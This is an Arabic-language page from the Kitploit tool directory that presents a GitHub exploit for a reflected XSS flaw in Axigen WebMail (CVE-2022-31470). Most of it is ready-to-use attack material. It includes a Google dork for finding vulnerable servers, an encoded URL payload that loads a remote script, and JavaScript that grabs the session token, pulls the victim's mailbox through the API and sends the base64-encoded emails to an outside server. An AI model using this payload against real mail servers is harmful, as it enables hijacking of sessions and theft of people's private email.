Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/amirzargham/cve-2023-08-21-exploit
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلومات
GitHubamirzargham/cve-2023-08-21-exploit

CVE-2023-08-21-exploit

Axigen < 10.3.3.47, 10.2.3.12 - XSS المنعكس

عرض المستودع
13منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عنوان الاستغلال: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS

Google Dork: inurl:passwordexpired=yes

التاريخ: 2023-08-21

مؤلف الاستغلال: AmirZargham

الصفحة الرئيسية للمطور: https://www.axigen.com/

رابط البرنامج: https://www.axigen.com/mail-server/download/

الإصدار: (10.5.0–4370c946) والإصدارات الأقدم من Axigen WebMail

تم الاختبار على: firefox,chrome

CVE: CVE-2022-31470

الاستغلال نستخدم ثغرة XSS المنعكسة الثانية لاستغلال هذه الثغرة، وإنشاء رابط خبيث، وسرقة رسائل المستخدمين الإلكترونية.

كود التحميل يقوم كود التحميل هذا بتحميل وتنفيذ كود استغلال JavaScript من خادم بعيد.

root@kitploit:~
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
  document.body.appendChild(x)
})//

النموذج المرمّز /index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27 https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//

كود الاستغلال

root@kitploit:~
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');

xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
            if (xhr2.readyState === XMLHttpRequest.DONE) {
                if (xhr2.status === 401){
                    script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
                    document.body.appendChild(script_tag);
                } else {
                    resp = xhr2.responseText;
                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
                    xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
                    xhr3.onreadystatechange = () => {
                        if (xhr3.readyState === XMLHttpRequest.DONE) {
                            emails = xhr3.responseText;
                            script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                            document.body.appendChild(script_tag);
                        }
                    };
                    xhr3.send();
                }
            }
        };
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
    }
};
xhr1.send();

دمج كود التحميل والاستغلال يمكنك استضافة كود الاستغلال في أي مكان ثم الإشارة إليه داخل كود التحميل.

نُشر في: exploit-db.

نُشر في: 0day.today.

نُشر في: packet storm.

تنزيل الأداة